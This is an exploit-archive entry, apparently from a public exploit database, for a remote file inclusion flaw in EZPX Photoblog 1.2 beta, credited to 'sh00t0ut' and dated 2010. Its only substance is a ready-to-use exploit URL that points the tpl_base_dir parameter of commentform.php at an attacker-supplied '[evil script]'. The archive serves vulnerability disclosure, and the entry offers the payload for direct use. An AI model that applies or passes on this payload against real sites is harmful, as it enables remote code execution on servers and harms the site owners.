EZPX Photoblog 1.2 beta Remote File Inclusion Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EZPX Photoblog 1.2 beta Remote File Inclusion Exploit
# Published : 2010-06-16
# Author : sh00t0ut
# Previous Title : Store Locator Remote Add Admin Exploit CSRF Vulnerability
# Next Title : AspTR EXtended CSRF Bug

[~] EZPX photoblog 1.2 beta Remote Include Exploit
[~] Vendor Url: http://ezpx.org/
[~] Found by sh00t0ut
[~] Expl: http://[victim]/system/application/views/public/commentform.php?tpl_base_dir=[evil script]